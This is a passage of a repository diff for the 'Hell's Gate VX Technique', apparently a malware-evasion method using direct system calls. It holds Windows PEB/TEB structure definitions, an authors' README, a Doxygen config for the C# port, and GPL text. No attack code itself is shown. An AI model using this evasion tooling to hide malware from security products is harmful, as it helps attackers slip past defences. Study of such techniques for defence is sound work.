PVOID ReadOnlySharedMemoryHeap;
|
||||
PVOID* ReadOnlyStaticServerData;
|
||||
PVOID AnsiCodePageData;
|
||||
PVOID OemCodePageData;
|
||||
PVOID UnicodeCaseTableData;
|
||||
ULONG NumberOfProcessors;
|
||||
ULONG NtGlobalFlag;
|
||||
BYTE Spare2[0x4];
|
||||
LARGE_INTEGER CriticalSectionTimeout;
|
||||
ULONG HeapSegmentReserve;
|
||||
ULONG HeapSegmentCommit;
|
||||
ULONG HeapDeCommitTotalFreeThreshold;
|
||||
ULONG HeapDeCommitFreeBlockThreshold;
|
||||
ULONG NumberOfHeaps;
|
||||
ULONG MaximumNumberOfHeaps;
|
||||
PVOID** ProcessHeaps;
|
||||
PVOID GdiSharedHandleTable;
|
||||
PVOID ProcessStarterHelper;
|
||||
PVOID GdiDCAttributeList;
|
||||
PVOID LoaderLock;
|
||||
ULONG OSMajorVersion;
|
||||
ULONG OSMinorVersion;
|
||||
ULONG OSBuildNumber;
|
||||
ULONG OSPlatformId;
|
||||
ULONG ImageSubSystem;
|
||||
ULONG ImageSubSystemMajorVersion;
|
||||
ULONG ImageSubSystemMinorVersion;
|
||||
ULONG GdiHandleBuffer[0x22];
|
||||
ULONG PostProcessInitRoutine;
|
||||
ULONG TlsExpansionBitmap;
|
||||
BYTE TlsExpansionBitmapBits[0x80];
|
||||
ULONG SessionId;
|
||||
} PEB, * PPEB;
|
||||
|
||||
typedef struct __CLIENT_ID {
|
||||
HANDLE UniqueProcess;
|
||||
HANDLE UniqueThread;
|
||||
} CLIENT_ID, * PCLIENT_ID;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||
ULONG Flags;
|
||||
PCHAR FrameName;
|
||||
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME {
|
||||
ULONG Flags;
|
||||
struct _TEB_ACTIVE_FRAME* Previous;
|
||||
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
||||
|
||||
typedef struct _GDI_TEB_BATCH {
|
||||
ULONG Offset;
|
||||
ULONG HDC;
|
||||
ULONG Buffer[310];
|
||||
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
|
||||
|
||||
typedef PVOID PACTIVATION_CONTEXT;
|
||||
|
||||
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
|
||||
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
|
||||
PACTIVATION_CONTEXT ActivationContext;
|
||||
ULONG Flags;
|
||||
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
|
||||
|
||||
typedef struct _ACTIVATION_CONTEXT_STACK {
|
||||
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
|
||||
LIST_ENTRY FrameListCache;
|
||||
ULONG Flags;
|
||||
ULONG NextCookieSequenceNumber;
|
||||
ULONG StackId;
|
||||
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
|
||||
|
||||
typedef struct _TEB {
|
||||
NT_TIB NtTib;
|
||||
PVOID EnvironmentPointer;
|
||||
CLIENT_ID ClientId;
|
||||
PVOID ActiveRpcHandle;
|
||||
PVOID ThreadLocalStoragePointer;
|
||||
PPEB ProcessEnvironmentBlock;
|
||||
ULONG LastErrorValue;
|
||||
ULONG CountOfOwnedCriticalSections;
|
||||
PVOID CsrClientThread;
|
||||
PVOID Win32ThreadInfo;
|
||||
ULONG User32Reserved[26];
|
||||
ULONG UserReserved[5];
|
||||
PVOID WOW32Reserved;
|
||||
LCID CurrentLocale;
|
||||
ULONG FpSoftwareStatusRegister;
|
||||
PVOID SystemReserved1[54];
|
||||
LONG ExceptionCode;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
|
||||
ULONG TxFsContext;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
|
||||
#else
|
||||
ACTIVATION_CONTEXT_STACK ActivationContextStack;
|
||||
UCHAR SpareBytes1[24];
|
||||
#endif
|
||||
GDI_TEB_BATCH GdiTebBatch;
|
||||
CLIENT_ID RealClientId;
|
||||
PVOID GdiCachedProcessHandle;
|
||||
ULONG GdiClientPID;
|
||||
ULONG GdiClientTID;
|
||||
PVOID GdiThreadLocalInfo;
|
||||
PSIZE_T Win32ClientInfo[62];
|
||||
PVOID glDispatchTable[233];
|
||||
PSIZE_T glReserved1[29];
|
||||
PVOID glReserved2;
|
||||
PVOID glSectionInfo;
|
||||
PVOID glSection;
|
||||
PVOID glTable;
|
||||
PVOID glCurrentRC;
|
||||
PVOID glContext;
|
||||
NTSTATUS LastStatusValue;
|
||||
UNICODE_STRING StaticUnicodeString;
|
||||
WCHAR StaticUnicodeBuffer[261];
|
||||
PVOID DeallocationStack;
|
||||
PVOID TlsSlots[64];
|
||||
LIST_ENTRY TlsLinks;
|
||||
PVOID Vdm;
|
||||
PVOID ReservedForNtRpc;
|
||||
PVOID DbgSsReserved[2];
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG HardErrorMode;
|
||||
#else
|
||||
ULONG HardErrorsAreDisabled;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
|
||||
GUID ActivityId;
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
PVOID EtwTraceData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID Instrumentation[14];
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
#else
|
||||
PVOID Instrumentation[16];
|
||||
#endif
|
||||
PVOID WinSockData;
|
||||
ULONG GdiBatchCount;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
BOOLEAN SpareBool0;
|
||||
BOOLEAN SpareBool1;
|
||||
BOOLEAN SpareBool2;
|
||||
#else
|
||||
BOOLEAN InDbgPrint;
|
||||
BOOLEAN FreeStackOnTermination;
|
||||
BOOLEAN HasFiberData;
|
||||
#endif
|
||||
UCHAR IdealProcessor;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG GuaranteedStackBytes;
|
||||
#else
|
||||
ULONG Spare3;
|
||||
#endif
|
||||
PVOID ReservedForPerf;
|
||||
PVOID ReservedForOle;
|
||||
ULONG WaitingOnLoaderLock;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID SavedPriorityState;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR ThreadPoolData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG_PTR SparePointer1;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR SoftPatchPtr2;
|
||||
#else
|
||||
Wx86ThreadState Wx86Thread;
|
||||
#endif
|
||||
PVOID* TlsExpansionSlots;
|
||||
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
|
||||
PVOID DeallocationBStore;
|
||||
PVOID BStoreLimit;
|
||||
#endif
|
||||
ULONG ImpersonationLocale;
|
||||
ULONG IsImpersonating;
|
||||
PVOID NlsCache;
|
||||
PVOID pShimData;
|
||||
ULONG HeapVirtualAffinity;
|
||||
HANDLE CurrentTransactionHandle;
|
||||
PTEB_ACTIVE_FRAME ActiveFrame;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID FlsData;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID PreferredLangauges;
|
||||
PVOID UserPrefLanguages;
|
||||
PVOID MergedPrefLanguages;
|
||||
ULONG MuiImpersonation;
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT SpareCrossTebFlags : 16;
|
||||
};
|
||||
USHORT CrossTebFlags;
|
||||
};
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT DbgSafeThunkCall : 1;
|
||||
USHORT DbgInDebugPrint : 1;
|
||||
USHORT DbgHasFiberData : 1;
|
||||
USHORT DbgSkipThreadAttach : 1;
|
||||
USHORT DbgWerInShipAssertCode : 1;
|
||||
USHORT DbgIssuedInitialBp : 1;
|
||||
USHORT DbgClonedThread : 1;
|
||||
USHORT SpareSameTebBits : 9;
|
||||
};
|
||||
USHORT SameTebFlags;
|
||||
};
|
||||
PVOID TxnScopeEntercallback;
|
||||
PVOID TxnScopeExitCAllback;
|
||||
PVOID TxnScopeContext;
|
||||
ULONG LockCount;
|
||||
ULONG ProcessRundown;
|
||||
ULONG64 LastSwitchTime;
|
||||
ULONG64 TotalSwitchOutTime;
|
||||
LARGE_INTEGER WaitReasonBitMap;
|
||||
#else
|
||||
BOOLEAN SafeThunkCall;
|
||||
BOOLEAN BooleanSpare[3];
|
||||
#endif
|
||||
} TEB, * PTEB;
|
||||
|
||||
typedef struct _LDR_DATA_TABLE_ENTRY {
|
||||
LIST_ENTRY InLoadOrderLinks;
|
||||
LIST_ENTRY InMemoryOrderLinks;
|
||||
LIST_ENTRY InInitializationOrderLinks;
|
||||
PVOID DllBase;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
WORD LoadCount;
|
||||
WORD TlsIndex;
|
||||
union {
|
||||
LIST_ENTRY HashLinks;
|
||||
struct {
|
||||
PVOID SectionPointer;
|
||||
ULONG CheckSum;
|
||||
};
|
||||
};
|
||||
union {
|
||||
ULONG TimeDateStamp;
|
||||
PVOID LoadedImports;
|
||||
};
|
||||
PACTIVATION_CONTEXT EntryPointActivationContext;
|
||||
PVOID PatchInformation;
|
||||
LIST_ENTRY ForwarderLinks;
|
||||
LIST_ENTRY ServiceTagLinks;
|
||||
LIST_ENTRY StaticLinks;
|
||||
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
|
||||
|
||||
typedef struct _OBJECT_ATTRIBUTES {
|
||||
ULONG Length;
|
||||
PVOID RootDirectory;
|
||||
PUNICODE_STRING ObjectName;
|
||||
ULONG Attributes;
|
||||
PVOID SecurityDescriptor;
|
||||
PVOID SecurityQualityOfService;
|
||||
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
|
||||
|
||||
typedef struct _INITIAL_TEB {
|
||||
PVOID StackBase;
|
||||
PVOID StackLimit;
|
||||
PVOID StackCommit;
|
||||
PVOID StackCommitMax;
|
||||
PVOID StackReserved;
|
||||
} INITIAL_TEB, * PINITIAL_TEB;
|
21
VXUG-Papers/Hells Gate/C Implementation/README.md
Normal file
21
VXUG-Papers/Hells Gate/C Implementation/README.md
Normal file
|
@ -0,0 +1,21 @@
|
|||
## Hell's Gate ##
|
||||
|
||||
Original C Implementation of the Hell's Gate VX Technique
|
||||
<br />
|
||||
<br />
|
||||
Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
|
||||
<br /> PDF also included in this repository.
|
||||
<br />
|
||||
<br />
|
||||
Authors:
|
||||
* Paul Laîné (@am0nsec)
|
||||
* smelly__vx (@RtlMateusz)
|
||||
<br />
|
||||
|
||||
### Update ###
|
||||
Please note:
|
||||
* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
|
||||
* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
|
||||
* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
|
||||
* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
|
||||
|
385
VXUG-Papers/Hells Gate/C# Implementation/Doxyfile
Normal file
385
VXUG-Papers/Hells Gate/C# Implementation/Doxyfile
Normal file
|
@ -0,0 +1,385 @@
|
|||
# Doxyfile 1.8.18
|
||||
|
||||
#---------------------------------------------------------------------------
|
||||
# Project related configuration options
|
||||
#---------------------------------------------------------------------------
|
||||
DOXYFILE_ENCODING = UTF-8
|
||||
PROJECT_NAME = "Shap Hell's Gate"
|
||||
PROJECT_NUMBER = 1.0
|
||||
PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
|
||||
PROJECT_LOGO =
|
||||
OUTPUT_DIRECTORY = ./doc/
|
||||
CREATE_SUBDIRS = YES
|
||||
ALLOW_UNICODE_NAMES = NO
|
||||
OUTPUT_LANGUAGE = English
|
||||
OUTPUT_TEXT_DIRECTION = None
|
||||
BRIEF_MEMBER_DESC = YES
|
||||
REPEAT_BRIEF = YES
|
||||
ABBREVIATE_BRIEF = "The $name class" \
|
||||
"The $name widget" \
|
||||
"The $name file" \
|
||||
is \
|
||||
provides \
|
||||
specifies \
|
||||
contains \
|
||||
represents \
|
||||
a \
|
||||
an \
|
||||
the
|
||||
ALWAYS_DETAILED_SEC = NO
|
||||
INLINE_INHERITED_MEMB = NO
|
||||
FULL_PATH_NAMES = YES
|
||||
STRIP_FROM_PATH =
|
||||
STRIP_FROM_INC_PATH =
|
||||
SHORT_NAMES = NO
|
||||
JAVADOC_AUTOBRIEF = NO
|
||||
JAVADOC_BANNER = NO
|
||||
QT_AUTOBRIEF = NO
|
||||
MULTILINE_CPP_IS_BRIEF = NO
|
||||
INHERIT_DOCS = YES
|
||||
SEPARATE_MEMBER_PAGES = NO
|
||||
TAB_SIZE = 4
|
||||
ALIASES =
|
||||
OPTIMIZE_OUTPUT_FOR_C = NO
|
||||
OPTIMIZE_OUTPUT_JAVA = NO
|
||||
OPTIMIZE_FOR_FORTRAN = NO
|
||||
OPTIMIZE_OUTPUT_VHDL = NO
|
||||
OPTIMIZE_OUTPUT_SLICE = NO
|
||||
EXTENSION_MAPPING =
|
||||
MARKDOWN_SUPPORT = YES
|
||||
TOC_INCLUDE_HEADINGS = 5
|
||||
AUTOLINK_SUPPORT = YES
|
||||
BUILTIN_STL_SUPPORT = NO
|
||||
CPP_CLI_SUPPORT = NO
|
||||
SIP_SUPPORT = NO
|
||||
IDL_PROPERTY_SUPPORT = YES
|
||||
DISTRIBUTE_GROUP_DOC = NO
|
||||
GROUP_NESTED_COMPOUNDS = NO
|
||||
SUBGROUPING = YES
|
||||
INLINE_GROUPED_CLASSES = NO
|
||||
INLINE_SIMPLE_STRUCTS = NO
|
||||
TYPEDEF_HIDES_STRUCT = NO
|
||||
LOOKUP_CACHE_SIZE = 0
|
||||
#---------------------------------------------------------------------------
|
||||
# Build related configuration options
|
||||
#---------------------------------------------------------------------------
|
||||
EXTRACT_ALL = YES
|
||||
EXTRACT_PRIVATE = YES
|
||||
EXTRACT_PRIV_VIRTUAL = YES
|
||||
EXTRACT_PACKAGE = YES
|
||||
EXTRACT_STATIC = YES
|
||||
EXTRACT_LOCAL_CLASSES = YES
|
||||
EXTRACT_LOCAL_METHODS = NO
|
||||
EXTRACT_ANON_NSPACES = YES
|
||||
HIDE_UNDOC_MEMBERS = NO
|
||||
HIDE_UNDOC_CLASSES = NO
|
||||
HIDE_FRIEND_COMPOUNDS = NO
|
||||
HIDE_IN_BODY_DOCS = NO
|
||||
INTERNAL_DOCS = NO
|
||||
CASE_SENSE_NAMES = YES
|
||||
HIDE_SCOPE_NAMES = NO
|
||||
HIDE_COMPOUND_REFERENCE= NO
|
||||
SHOW_INCLUDE_FILES = YES
|
||||
SHOW_GROUPED_MEMB_INC = NO
|
||||
FORCE_LOCAL_INCLUDES = NO
|
||||
INLINE_INFO = YES
|
||||
SORT_MEMBER_DOCS = YES
|
||||
SORT_BRIEF_DOCS = NO
|
||||
SORT_MEMBERS_CTORS_1ST = NO
|
||||
SORT_GROUP_NAMES = NO
|
||||
SORT_BY_SCOPE_NAME = NO
|
||||
STRICT_PROTO_MATCHING = NO
|
||||
GENERATE_TODOLIST = YES
|
||||
GENERATE_TESTLIST = YES
|
||||
GENERATE_BUGLIST = YES
|
||||
GENERATE_DEPRECATEDLIST= YES
|
||||
ENABLED_SECTIONS =
|
||||
MAX_INITIALIZER_LINES = 30
|
||||
SHOW_USED_FILES = YES
|
||||
SHOW_FILES = YES
|
||||
SHOW_NAMESPACES = YES
|
||||
FILE_VERSION_FILTER =
|
||||
LAYOUT_FILE =
|
||||
CITE_BIB_FILES =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to warning and progress messages
|
||||
#---------------------------------------------------------------------------
|
||||
QUIET = NO
|
||||
WARNINGS = YES
|
||||
WARN_IF_UNDOCUMENTED = YES
|
||||
WARN_IF_DOC_ERROR = YES
|
||||
WARN_NO_PARAMDOC = NO
|
||||
WARN_AS_ERROR = NO
|
||||
WARN_FORMAT = "$file:$line: $text"
|
||||
WARN_LOGFILE =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the input files
|
||||
#---------------------------------------------------------------------------
|
||||
INPUT = .
|
||||
INPUT_ENCODING = UTF-8
|
||||
FILE_PATTERNS = *.c \
|
||||
*.cc \
|
||||
*.cxx \
|
||||
*.cpp \
|
||||
*.c++ \
|
||||
*.java \
|
||||
*.ii \
|
||||
*.ixx \
|
||||
*.ipp \
|
||||
*.i++ \
|
||||
*.inl \
|
||||
*.idl \
|
||||
*.ddl \
|
||||
*.odl \
|
||||
*.h \
|
||||
*.hh \
|
||||
*.hxx \
|
||||
*.hpp \
|
||||
*.h++ \
|
||||
*.cs \
|
||||
*.d \
|
||||
*.php \
|
||||
*.php4 \
|
||||
*.php5 \
|
||||
*.phtml \
|
||||
*.inc \
|
||||
*.m \
|
||||
*.markdown \
|
||||
*.md \
|
||||
*.mm \
|
||||
*.dox \
|
||||
*.doc \
|
||||
*.txt \
|
||||
*.py \
|
||||
*.pyw \
|
||||
*.f90 \
|
||||
*.f95 \
|
||||
*.f03 \
|
||||
*.f08 \
|
||||
*.f18 \
|
||||
*.f \
|
||||
*.for \
|
||||
*.vhd \
|
||||
*.vhdl \
|
||||
*.ucf \
|
||||
*.qsf \
|
||||
*.ice
|
||||
RECURSIVE = YES
|
||||
EXCLUDE =
|
||||
EXCLUDE_SYMLINKS = NO
|
||||
EXCLUDE_PATTERNS =
|
||||
EXCLUDE_SYMBOLS =
|
||||
EXAMPLE_PATH =
|
||||
EXAMPLE_PATTERNS = *
|
||||
EXAMPLE_RECURSIVE = NO
|
||||
IMAGE_PATH =
|
||||
INPUT_FILTER =
|
||||
FILTER_PATTERNS =
|
||||
FILTER_SOURCE_FILES = NO
|
||||
FILTER_SOURCE_PATTERNS =
|
||||
USE_MDFILE_AS_MAINPAGE =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to source browsing
|
||||
#---------------------------------------------------------------------------
|
||||
SOURCE_BROWSER = YES
|
||||
INLINE_SOURCES = YES
|
||||
STRIP_CODE_COMMENTS = YES
|
||||
REFERENCED_BY_RELATION = YES
|
||||
REFERENCES_RELATION = NO
|
||||
REFERENCES_LINK_SOURCE = YES
|
||||
SOURCE_TOOLTIPS = YES
|
||||
USE_HTAGS = NO
|
||||
VERBATIM_HEADERS = YES
|
||||
CLANG_ASSISTED_PARSING = NO
|
||||
CLANG_OPTIONS =
|
||||
CLANG_DATABASE_PATH =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the alphabetical class index
|
||||
#---------------------------------------------------------------------------
|
||||
ALPHABETICAL_INDEX = YES
|
||||
COLS_IN_ALPHA_INDEX = 5
|
||||
IGNORE_PREFIX =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the HTML output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_HTML = YES
|
||||
HTML_OUTPUT = html
|
||||
HTML_FILE_EXTENSION = .html
|
||||
HTML_HEADER =
|
||||
HTML_FOOTER =
|
||||
HTML_STYLESHEET =
|
||||
HTML_EXTRA_STYLESHEET =
|
||||
HTML_EXTRA_FILES =
|
||||
HTML_COLORSTYLE_HUE = 220
|
||||
HTML_COLORSTYLE_SAT = 100
|
||||
HTML_COLORSTYLE_GAMMA = 80
|
||||
HTML_TIMESTAMP = YES
|
||||
HTML_DYNAMIC_MENUS = YES
|
||||
HTML_DYNAMIC_SECTIONS = NO
|
||||
HTML_INDEX_NUM_ENTRIES = 100
|
||||
GENERATE_DOCSET = NO
|
||||
DOCSET_FEEDNAME = "Doxygen generated docs"
|
||||
DOCSET_BUNDLE_ID = org.doxygen.Project
|
||||
DOCSET_PUBLISHER_ID = org.doxygen.Publisher
|
||||
DOCSET_PUBLISHER_NAME = Publisher
|
||||
GENERATE_HTMLHELP = NO
|
||||
CHM_FILE =
|
||||
HHC_LOCATION =
|
||||
GENERATE_CHI = NO
|
||||
CHM_INDEX_ENCODING =
|
||||
BINARY_TOC = NO
|
||||
TOC_EXPAND = NO
|
||||
GENERATE_QHP = NO
|
||||
QCH_FILE =
|
||||
QHP_NAMESPACE = org.doxygen.Project
|
||||
QHP_VIRTUAL_FOLDER = doc
|
||||
QHP_CUST_FILTER_NAME =
|
||||
QHP_CUST_FILTER_ATTRS =
|
||||
QHP_SECT_FILTER_ATTRS =
|
||||
QHG_LOCATION =
|
||||
GENERATE_ECLIPSEHELP = NO
|
||||
ECLIPSE_DOC_ID = org.doxygen.Project
|
||||
DISABLE_INDEX = NO
|
||||
GENERATE_TREEVIEW = YES
|
||||
ENUM_VALUES_PER_LINE = 4
|
||||
TREEVIEW_WIDTH = 250
|
||||
EXT_LINKS_IN_WINDOW = NO
|
||||
HTML_FORMULA_FORMAT = png
|
||||
FORMULA_FONTSIZE = 10
|
||||
FORMULA_TRANSPARENT = YES
|
||||
FORMULA_MACROFILE =
|
||||
USE_MATHJAX = NO
|
||||
MATHJAX_FORMAT = HTML-CSS
|
||||
MATHJAX_RELPATH = https://cdn.jsdelivr.net/npm/mathjax@2
|
||||
MATHJAX_EXTENSIONS =
|
||||
MATHJAX_CODEFILE =
|
||||
SEARCHENGINE = YES
|
||||
SERVER_BASED_SEARCH = NO
|
||||
EXTERNAL_SEARCH = NO
|
||||
SEARCHENGINE_URL =
|
||||
SEARCHDATA_FILE = searchdata.xml
|
||||
EXTERNAL_SEARCH_ID =
|
||||
EXTRA_SEARCH_MAPPINGS =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the LaTeX output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_LATEX = NO
|
||||
LATEX_OUTPUT = latex
|
||||
LATEX_CMD_NAME =
|
||||
MAKEINDEX_CMD_NAME = makeindex
|
||||
LATEX_MAKEINDEX_CMD = makeindex
|
||||
COMPACT_LATEX = NO
|
||||
PAPER_TYPE = a4
|
||||
EXTRA_PACKAGES =
|
||||
LATEX_HEADER =
|
||||
LATEX_FOOTER =
|
||||
LATEX_EXTRA_STYLESHEET =
|
||||
LATEX_EXTRA_FILES =
|
||||
PDF_HYPERLINKS = YES
|
||||
USE_PDFLATEX = YES
|
||||
LATEX_BATCHMODE = NO
|
||||
LATEX_HIDE_INDICES = NO
|
||||
LATEX_SOURCE_CODE = NO
|
||||
LATEX_BIB_STYLE = plain
|
||||
LATEX_TIMESTAMP = NO
|
||||
LATEX_EMOJI_DIRECTORY =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the RTF output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_RTF = NO
|
||||
RTF_OUTPUT = rtf
|
||||
COMPACT_RTF = NO
|
||||
RTF_HYPERLINKS = NO
|
||||
RTF_STYLESHEET_FILE =
|
||||
RTF_EXTENSIONS_FILE =
|
||||
RTF_SOURCE_CODE = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the man page output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_MAN = NO
|
||||
MAN_OUTPUT = man
|
||||
MAN_EXTENSION = .3
|
||||
MAN_SUBDIR =
|
||||
MAN_LINKS = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the XML output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_XML = NO
|
||||
XML_OUTPUT = xml
|
||||
XML_PROGRAMLISTING = YES
|
||||
XML_NS_MEMB_FILE_SCOPE = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the DOCBOOK output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_DOCBOOK = NO
|
||||
DOCBOOK_OUTPUT = docbook
|
||||
DOCBOOK_PROGRAMLISTING = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options for the AutoGen Definitions output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_AUTOGEN_DEF = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the Perl module output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_PERLMOD = NO
|
||||
PERLMOD_LATEX = NO
|
||||
PERLMOD_PRETTY = YES
|
||||
PERLMOD_MAKEVAR_PREFIX =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the preprocessor
|
||||
#---------------------------------------------------------------------------
|
||||
ENABLE_PREPROCESSING = YES
|
||||
MACRO_EXPANSION = NO
|
||||
EXPAND_ONLY_PREDEF = NO
|
||||
SEARCH_INCLUDES = YES
|
||||
INCLUDE_PATH =
|
||||
INCLUDE_FILE_PATTERNS =
|
||||
PREDEFINED =
|
||||
EXPAND_AS_DEFINED =
|
||||
SKIP_FUNCTION_MACROS = YES
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to external references
|
||||
#---------------------------------------------------------------------------
|
||||
TAGFILES =
|
||||
GENERATE_TAGFILE =
|
||||
ALLEXTERNALS = NO
|
||||
EXTERNAL_GROUPS = YES
|
||||
EXTERNAL_PAGES = YES
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the dot tool
|
||||
#---------------------------------------------------------------------------
|
||||
CLASS_DIAGRAMS = YES
|
||||
DIA_PATH =
|
||||
HIDE_UNDOC_RELATIONS = YES
|
||||
HAVE_DOT = NO
|
||||
DOT_NUM_THREADS = 1
|
||||
DOT_FONTNAME = Helvetica
|
||||
DOT_FONTSIZE = 10
|
||||
DOT_FONTPATH =
|
||||
CLASS_GRAPH = YES
|
||||
COLLABORATION_GRAPH = YES
|
||||
GROUP_GRAPHS = YES
|
||||
UML_LOOK = NO
|
||||
UML_LIMIT_NUM_FIELDS = 10
|
||||
TEMPLATE_RELATIONS = NO
|
||||
INCLUDE_GRAPH = YES
|
||||
INCLUDED_BY_GRAPH = YES
|
||||
CALL_GRAPH = NO
|
||||
CALLER_GRAPH = NO
|
||||
GRAPHICAL_HIERARCHY = YES
|
||||
DIRECTORY_GRAPH = YES
|
||||
DOT_IMAGE_FORMAT = png
|
||||
INTERACTIVE_SVG = NO
|
||||
DOT_PATH =
|
||||
DOTFILE_DIRS =
|
||||
MSCFILE_DIRS =
|
||||
DIAFILE_DIRS =
|
||||
PLANTUML_JAR_PATH =
|
||||
PLANTUML_CFG_FILE =
|
||||
PLANTUML_INCLUDE_PATH =
|
||||
DOT_GRAPH_MAX_NODES = 50
|
||||
MAX_DOT_GRAPH_DEPTH = 0
|
||||
DOT_TRANSPARENT = NO
|
||||
DOT_MULTI_TARGETS = YES
|
||||
GENERATE_LEGEND = YES
|
||||
DOT_CLEANUP = YES
|
674
VXUG-Papers/Hells Gate/C# Implementation/LICENSE
Normal file
674
VXUG-Papers/Hells Gate/C# Implementation/LICENSE
Normal file
|
@ -0,0 +1,674 @@
|
|||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
